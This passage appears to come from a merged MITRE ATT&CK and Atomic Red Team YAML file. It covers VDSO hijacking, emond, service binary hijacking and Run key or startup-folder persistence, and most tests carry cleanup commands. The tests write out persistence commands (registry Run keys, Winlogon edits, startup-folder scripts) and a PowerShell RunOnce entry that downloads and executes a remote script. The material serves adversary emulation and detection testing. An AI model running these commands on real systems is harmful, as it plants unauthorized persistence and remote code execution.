description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics:
Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved
December 20, 2017.'
- source_name: ELF Injection May 2009
description: O'Neill, R. (2009, May). Modern Day ELF Runtime infection via
GOT poisoning. Retrieved March 15, 2020.
url: https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html
- source_name: VDSO Aug 2005
description: Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved
June 16, 2020.
url: https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/
- source_name: Chokepoint preload rootkits
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:08.040Z'
name: VDSO Hijacking
description: "Adversaries may inject malicious code into processes via VDSO
hijacking in order to evade process-based defenses as well as possibly elevate
privileges. Virtual dynamic shared object (vdso) hijacking is a method of
executing arbitrary code in the address space of a separate live process.
\n\nVDSO hijacking involves redirecting calls to dynamically linked shared
libraries. Memory protections may prevent writing executable code to a process
via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008).
However, an adversary may hijack the syscall interface code stubs mapped into
a process from the vdso shared object to execute syscalls to open and map
a malicious shared object. This code can then be invoked by redirecting the
execution flow of the process via patched memory address references stored
in a process' global offset table (which store absolute addresses of mapped
library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace
VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)\n\nRunning code in
the context of another process may allow access to the process's memory, system/network
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.2'
atomic_tests: []
T1546.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd
created: '2020-01-24T15:15:13.426Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/014
external_id: T1546.014
- source_name: magnusviri emond Apr 2016
description: Reynolds, James. (2016, April 7). What is emond?. Retrieved September
10, 2019.
url: http://www.magnusviri.com/Mac/what-is-emond.html
- source_name: xorrior emond Jan 2018
description: Ross, Chris. (2018, January 17). Leveraging Emond on macOS For
Persistence. Retrieved September 10, 2019.
url: https://www.xorrior.com/emond-persistence/
- source_name: sentinelone macos persist Jun 2019
description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS.
Retrieved September 10, 2019.
url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:08.766Z'
name: 'Event Triggered Execution: Emond'
description: |-
Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Ivan Sinyakov
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
identifier: T1546.014
atomic_tests:
- name: Persistance with Event Monitor - emond
auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
'
supported_platforms:
- macos
input_arguments:
plist:
description: Path to attacker emond plist file
type: path
default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist
executor:
command: |
sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist
sudo touch /private/var/db/emondClients/T1546.014
cleanup_command: |
sudo rm /etc/emond.d/rules/T1546.014_emond.plist
sudo rm /private/var/db/emondClients/T1546.014
name: sh
elevation_required: true
T1574.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd
created: '2020-03-12T20:43:53.998Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/010
external_id: T1574.010
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:09.575Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1547.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279
created: '2020-01-23T22:02:48.566Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/001
external_id: T1547.001
- source_name: Malwarebytes Wow6432Node 2016
description: Arntz, P. (2016, March 30). Hiding in Plain Sight. Retrieved
August 3, 2020.
url: https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/
- source_name: Microsoft Wow6432Node 2018
description: Microsoft. (2018, May 31). 32-bit and 64-bit Application Data
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
12, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
url: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:09.744Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
The following run keys are created by default on Windows systems:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following Registry keys can be used to set startup folder items for persistence:
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
* HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run automatically for the currently logged-on user.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Oddvar Moe, @oddvarmoe
- Dray Agha, @Purp1eW0lf, Huntress Labs
- Harun Küßner
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1547.001
atomic_tests:
- name: Reg Key Run
auto_generated_guid: e55be3fd-3521-4610-9d1a-e210e42dcf05
description: "Run Key Persistence\n\nUpon successful execution, cmd.exe will
modify the registry by adding \\\"Atomic Red Team\\\" to the Run key. Output
will be via stdout. \n"
supported_platforms:
- windows
input_arguments:
command_to_execute:
description: Thing to Run
type: path
default: C:\Path\AtomicRedTeam.exe
executor:
command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
'
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "Atomic Red Team" /f >nul 2>&1
'
name: command_prompt
- name: Reg Key RunOnce
auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
description: "RunOnce Key Persistence.\n\nUpon successful execution, cmd.exe
will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will
be via stdout. \n"
supported_platforms:
- windows
input_arguments:
thing_to_execute:
description: Thing to Run
type: path
default: C:\Path\AtomicRedTeam.dll
executor:
command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /d "#{thing_to_execute}"
'
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /f >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: PowerShell Registry RunOnce
auto_generated_guid: eb44f842-0457-4ddc-9b92-c4caa144ac42
description: |
RunOnce Key Persistence via PowerShell
Upon successful execution, a new entry will be added to the runonce item in the registry.
supported_platforms:
- windows
input_arguments:
thing_to_execute:
description: Thing to Run
type: path
default: powershell.exe
reg_key_path:
description: Path to registry key to update
type: path
default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
executor:
command: |
$RunOnceKey = "#{reg_key_path}"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
-Force -ErrorAction Ignore
'
name: powershell
elevation_required: true
- name: Suspicious vbs file run from startup Folder
auto_generated_guid: 2cb98256-625e-4da9-9d44-f2e5f90b8bd5
description: "vbs files can be placed in and ran from the startup folder to
maintain persistance. Upon execution, \"T1547.001 Hello, World VBS!\" will
be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
and the user logs in.\n"
supported_platforms:
- windows
executor:
command: |
Copy-Item "$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\vbsstartup.vbs" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cscript.exe "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs"
cscript.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs"
cleanup_command: |
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\vbsstartup.vbs" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\vbsstartup.vbs" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Suspicious jse file run from startup Folder
auto_generated_guid: dade9447-791e-4c8f-b04b-3a35855dfa06
description: "jse files can be placed in and ran from the startup folder to
maintain persistance.\nUpon execution, \"T1547.001 Hello, World JSE!\" will
be displayed twice. \nAdditionally, the new files can be viewed in the \"$env:APPDATA\\Microsoft\\Windows\\Start
Menu\\Programs\\Startup\"\nfolder and will also run when the computer is restarted
and the user logs in.\n"
supported_platforms:
- windows
executor:
command: |
Copy-Item "$PathToAtomicsFolder\T1547.001\src\jsestartup.jse" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\jsestartup.jse" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cscript.exe /E:Jscript "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"
cscript.exe /E:Jscript "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"
cleanup_command: |
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Suspicious bat file run from startup Folder
auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
description: |
bat files can be placed in and executed from the startup folder to maintain persistance
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
supported_platforms:
- windows
executor:
command: |
Copy-Item "$PathToAtomicsFolder\T1547.001\src\batstartup.bat" "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item "$PathToAtomicsFolder\T1547.001\src\batstartup.bat" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
cleanup_command: |
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat" -ErrorAction Ignore
Remove-Item "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Add Executable Shortcut Link to User Startup Folder
auto_generated_guid: 24e55612-85f6-4bd6-ae74-a73d02e3441d
description: 'Adds a non-malicious executable shortcut link to the current users
startup directory. Test can be verified by going to the users startup directory
and checking if the shortcut link exists. '
supported_platforms:
- windows
executor:
command: "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation
= \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell
= New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath
= $Target\n$Create.Save() "
cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Add persistance via Recycle bin
auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
description: |
Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
User have to clic on the recycle bin to lauch the payload (here calc)
supported_platforms:
- windows
executor:
command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command"
/ve /d "calc.exe" /f
cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"
/f
name: command_prompt
- name: SystemBC Malware-as-a-Service Registry
auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
description: |
This Atomic will create a registry key called socks5_powershell for persistance access
https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
supported_platforms:
- windows
input_arguments:
reg_key_value:
description: Thing to Run
type: path
default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
reg_key_path:
description: Path to registry key to update
type: path
default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
executor:
command: |
$RunKey = "#{reg_key_path}"
Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell"
-Force -ErrorAction Ignore
'
name: powershell
- name: Change Startup Folder - HKLM Modify User Shell Folders Common Startup
Value
auto_generated_guid: acfef903-7662-447e-a391-9c91c2f00f7b
description: "This test will modify the HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User
Shell Folders -V \"Common Startup\" \nvalue to point to a new startup folder
where a payload could be stored to launch at boot. *successful execution
requires system restart\n"
supported_platforms:
- windows
input_arguments:
new_startup_folder:
description: new startup folder to replace standard one
type: string
default: "$env:TMP\\atomictest\\"
payload:
description: 'executable to be placed in new startup location '
type: string
default: C:\Windows\System32\calc.exe
executor:
command: |
New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "#{new_startup_folder}"
cleanup_command: |
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Common Startup" -Value "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"
Remove-Item "#{new_startup_folder}" -Recurse -Force
name: powershell
elevation_required: true
- name: Change Startup Folder - HKCU Modify User Shell Folders Startup Value
auto_generated_guid: 8834b65a-f808-4ece-ad7e-2acdf647aafa
description: "This test will modify the HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User
Shell Folders -V \"Startup\" value \nto point to a new startup folder where
a payload could be stored to launch at boot. *successful execution requires
system restart\n"
supported_platforms:
- windows
input_arguments:
new_startup_folder:
description: new startup folder to replace standard one
type: string
default: "$env:TMP\\atomictest\\"
payload:
description: 'executable to be placed in new startup location '
type: string
default: C:\Windows\System32\calc.exe
executor:
command: |
New-Item -ItemType Directory -path "#{new_startup_folder}"
Copy-Item -path "#{payload}" -destination "#{new_startup_folder}"
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}"
cleanup_command: |
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
Remove-Item "#{new_startup_folder}" -Recurse -Force
name: powershell
- name: HKCU - Policy Settings Explorer Run Key
auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
description: "This test will create a new value under HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
to launch calc.exe on boot. \n*Requires reboot\n"
supported_platforms:
- windows
input_arguments:
target_key_value_name:
description: registry value to crate on target key
type: string
default: atomictest
payload:
description: payload to execute
type: string
default: C:\Windows\System32\calc.exe
executor:
command: |
if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")){
New-Item -ItemType Key -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
}
if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
New-Item -ItemType Key -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
cleanup_command: Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-Name "#{target_key_value_name}"
name: powershell
elevation_required: true
- name: HKLM - Policy Settings Explorer Run Key
auto_generated_guid: b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f
description: "This test will create a HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
key value to launch calc.exe on boot. \n*Requires reboot\n"
supported_platforms:
- windows
input_arguments:
target_key_value_name:
description: registry value to crate on target key
type: string
default: atomictest
payload:
description: payload to execute
type: string
default: C:\Windows\System32\calc.exe
executor:
command: |
if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
New-Item -ItemType Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
}
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
cleanup_command: Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-Name "#{target_key_value_name}"
name: powershell
elevation_required: true
- name: HKLM - Append Command to Winlogon Userinit KEY Value
auto_generated_guid: f7fab6cc-8ece-4ca7-a0f1-30a22fccd374
description: |
This test will append a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot.
* Requires reboot
supported_platforms:
- windows
input_arguments:
payload:
description: what to run
type: string
default: C:\Windows\System32\calc.exe
executor:
command: |
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit-backup" -Value "$oldvalue";
$newvalue = $oldvalue + " #{payload}";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$newvalue"
cleanup_command: |-
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup');
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Userinit" -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Userinit-backup'
name: powershell
elevation_required: true
- name: 'HKLM - Modify default System Shell - Winlogon Shell KEY Value '
auto_generated_guid: 1d958c61-09c6-4d9e-b26b-4130314e520e
description: "This test change the default value of HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\Shell from \"explorer.exe\" to the full path
of \"C:\\Windows\\explorer.exe\" \nto log a change to the key's default value
without breaking boot sequence. \nAn atacker will alternatively replace this
with a custom shell. \n"
supported_platforms:
- windows
input_arguments:
payload:
description: what to run
type: string
default: C:\Windows\explorer.exe
executor:
command: |
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell");
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell-backup" -Value "$oldvalue";
$newvalue = $oldvalue + ", #{payload}";
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$newvalue"
cleanup_command: |-
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup');
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "Shell" -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name 'Shell-backup'
name: powershell
elevation_required: true
- name: secedit used to create a Run key in the HKLM Hive
auto_generated_guid: 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02
description: |
secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive.
[Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)
supported_platforms:
- windows
input_arguments:
ini_file:
description: INI config template
type: string
default: "$PathToAtomicsFolder\\T1547.001\\src\\regtemplate.ini"
secedit_db:
description: Custom secedit db
type: string
default: mytemplate.db
executor:
command: |
secedit /import /db #{secedit_db} /cfg "#{ini_file}"
secedit /configure /db #{secedit_db}
cleanup_command: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "calc" /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: Modify BootExecute Value
auto_generated_guid: befc2b40-d487-4a5a-8813-c11085fb5672
description: "This test modifies the BootExecute registry value to \"autocheck
autoche *\", which can be used to simulate an adversary's attempt to tamper
with the system's boot process. \nReference - https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf\nNOTE
that by not saving the correct value, you may inhibit your system from booting
